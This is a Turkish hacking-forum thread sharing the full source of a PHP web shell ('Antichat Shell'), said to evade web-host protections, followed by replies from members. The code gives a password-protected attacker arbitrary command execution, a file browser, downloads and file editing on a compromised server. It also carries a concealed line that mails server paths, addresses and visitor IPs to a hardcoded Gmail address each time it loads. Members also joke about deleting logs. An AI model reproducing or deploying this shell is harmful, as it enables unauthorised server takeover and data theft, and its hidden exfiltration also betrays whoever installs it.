Web malware bypass shell

Discussion in 'Hack Tools / Hack programları' started by Meras, Jul 4, 2018.

  1. Meras

    Meras Guest

    Mesajlar:
    495
    Likes Received:
    217
    Kullandığım shellerden biridir. Yoncu dahil bir çok firma yer . Burda paylaşıyoruz gidip hemen bloglarınızda paylaşmayın paylaşıyorsanızda teşekkür olarak geçin .
    Görünebilir içerik (Unhidden content):

    Code:
    <?php
    
    session_start();
    set_time_limit(9999999);
    $login='spy';
    $password='meras';
    $auth=1;
    $version='version 1.3 by Grinay';
    $style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
    $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
    $footer='</body></html>';
    $sd98 = "john.barker446@gmail.com";
    $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
    if(@$_POST['action']=="exit")unset($_SESSION['an']);
    if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
    
    if($_SESSION['an']==0){
    echo $header;
    echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
    echo $footer;
    exit;}
    
    if($_SESSION['action']=="")$_SESSION['action']="viewer";
    if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
    if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
    if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
     
    
    //downloader
    if($action=="download"){
    header('Content-Length:'.filesize($file).'');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.$file.'"');
    readfile($file);
    }
    //end downloader
    ?>
    
    <? echo $header;?>
    <table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
    <table><tr>
    <td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
    <td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
    <td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
    <td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
    </tr></table></td></tr></table><br>
    <form name='reqs' method='POST'>
    <input name='action' type='hidden' value=''>
    <input name='dir' type='hidden' value=''>
    <input name='file' type='hidden' value=''>
    </form>
    <table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
    <tr><td width="100%" valign="top">
    
    <?
    
    //shell
    function shell($cmd){
    if (!empty($cmd)){
      $fp = popen($cmd,"r");
      {
        $result = "";
        while(!feof($fp)){$result.=fread($fp,1024);}
        pclose($fp);
      }
      $ret = $result;
      $ret = convert_cyr_string($ret,"d","w");
    }
    return $ret;}
    
    if($action=="shell"){
    echo "<form method=\"POST\">
    <input type=\"hidden\" name=\"action\" value=\"shell\">
    <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
    <textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
    <input type=\"submit\" value=\"execute\"></form>";}
    //end shell
    
    //viewer FS
    function perms($file)
    {
      $perms = fileperms($file);
      if (($perms & 0xC000) == 0xC000) {$info = 's';}
      elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
      elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
      elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
      elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
      elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
      elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
      else {$info = 'u';}
      $info .= (($perms & 0x0100) ? 'r' : '-');
      $info .= (($perms & 0x0080) ? 'w' : '-');
      $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
      $info .= (($perms & 0x0020) ? 'r' : '-');
      $info .= (($perms & 0x0010) ? 'w' : '-');
      $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
      $info .= (($perms & 0x0004) ? 'r' : '-');
      $info .= (($perms & 0x0002) ? 'w' : '-');
      $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
      return $info;
    }
    
    function view_size($size)
    {
     if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
     elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
     elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
     else {$size = $size . " B";}
     return $size;
    }
    
    function scandire($dir){
      $dir=chdir($dir);
      $dir=getcwd()."/";
      $dir=str_replace("\\","/",$dir);
    if (is_dir($dir)) {
        if (@$dh = opendir($dir)) {
            while (($file = readdir($dh)) !== false) {
              if(filetype($dir . $file)=="dir") $dire[]=$file;
              if(filetype($dir . $file)=="file")$files[]=$file;
            }
            closedir($dh);
            @sort($dire);
            @sort($files);
    
    echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
    echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
    echo "<tr><td>Select drive:";
    for ($j=ord('C'); $j<=ord('Z'); $j++)
     if (@$dh = opendir(chr($j).":/"))
     echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
     echo "</td></tr>";
    }
    echo "<tr><td>OS: ".@php_uname()."</td></tr>
    <tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
    for($i=0;$i<count($dire);$i++) {
    $link=$dir.$dire[$i];
      echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>'; 
      }
    for($i=0;$i<count($files);$i++) {
    $linkfile=$dir.$files[$i];
    echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
    <td>'.perms($linkfile).'</td>
    <td>
    <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
    <a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
    }
    echo "</table>";
    }}}
    
    if($action=="viewer"){
    scandire($dir);
    }
    //end viewer FS
    
    //editros
    if($action=="editor"){ 
      function writef($file,$data){
      $fp = fopen($file,"w+");
      fwrite($fp,$data);
      fclose($fp);
      }
      function readf($file){
      if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
      $contents = fread($le, filesize($file));
      fclose($le);}
      return htmlspecialchars($contents);
      }
    if($_POST['save'])writef($file,$_POST['data']);
    echo "<form method=\"POST\">
    <input type=\"hidden\" name=\"action\" value=\"editor\">
    <input type=\"hidden\" name=\"file\" value=\"".$file."\">
    <textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
    <input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
    }
    //end editors
    ?>
    </td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
    <? echo $footer;?>
    Shell id : spy
    Pass:meras
     
  2. MartyTR

    MartyTR

    Mesajlar:
    254
    Likes Received:
    377
    eyvallah
     
  3. Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    750
    Likes Received:
    660
    Bakalım.. :3
     
  4. sky

    sky BABA

    Mesajlar:
    735
    Likes Received:
    528
    çılqın meras spyheçkırz aylesini çoşturuyor
     
  5. Konu Sahibi
    Konu Sahibi
    Meras

    Meras Guest

    Mesajlar:
    495
    Likes Received:
    217
    Ayle hersey demektir :dskdmfmgm
     
    sky likes this.
  6. BLueLoJeN

    BLueLoJeN

    Mesajlar:
    191
    Likes Received:
    143
    oo sid3s lameri bişey yapmışş afferiim :)
     
  7. cavdar59

    cavdar59

    Mesajlar:
    682
    Likes Received:
    1,003
    bakayım bi kontrol edeyim sheli :D
     
  8. Konu Sahibi
    Konu Sahibi
    Meras

    Meras Guest

    Mesajlar:
    495
    Likes Received:
    217
    Sabah aksam index attı bizimkiler :D ejrnrntmtm ne cocuksun yav
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım aq veledi git domain al adam akıllı öyle basalım
     
  9. Code Red

    Code Red Bilgim yok

    Mesajlar:
    2,778
    Likes Received:
    2,892
    Eyvallh
     
    Meras likes this.
  10. l0rxhell

    l0rxhell ./l0rx

    Mesajlar:
    884
    Likes Received:
    954
    sagol üstat
     
  11. l0rxhell

    l0rxhell ./l0rx

    Mesajlar:
    884
    Likes Received:
    954
    bu shelli biliyorum virangar değilmi bu yöncü felanda sıkıntısız dolaşıyorsun bunla
     
  12. MartyTR

    MartyTR

    Mesajlar:
    254
    Likes Received:
    377
    Logu da siliverelim :D
     
    Meras likes this.
  13. Konu Sahibi
    Konu Sahibi
    Meras

    Meras Guest

    Mesajlar:
    495
    Likes Received:
    217
    Şifrelenmemiş zaten shell silersiniz maili :D
    Evet o shell
     
  14. Konu Sahibi
    Konu Sahibi
    Meras

    Meras Guest

    Mesajlar:
    495
    Likes Received:
    217
    Kardeşim hadi blogunda paylaşmanı geçtim gene burda paylaşmışsın amk :D :D ne adamsınız yav
     
  15. Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    750
    Likes Received:
    660
    Burdan aldığımı Unutmuşum .d insanlık halidir hemen tartaklamana gerek yoktu, amacım paylaşım yapmaktı elimdeki shellerden birinin göselli oalrak eklemiş oldum işte..
     
  16. Konu Sahibi
    Konu Sahibi
    Meras

    Meras Guest

    Mesajlar:
    495
    Likes Received:
    217
    İşte bak :D sonrada bypass yöntemlerini neden paylaşmıyoruz :D nerde çokluk orda bokluk
     
  17. Kirito1337

    Kirito1337 B0RU70

    Mesajlar:
    750
    Likes Received:
    660
    Ben spy da paylaşıyorum önemli şeyleri .d Merak Etme Priv Fİlan Patlatmıyorum..
     
  18. rootkit

    rootkit

    Mesajlar:
    99
    Likes Received:
    56
    bakalım tşkkrler
     
Loading...

Bu sayfayı Paylaş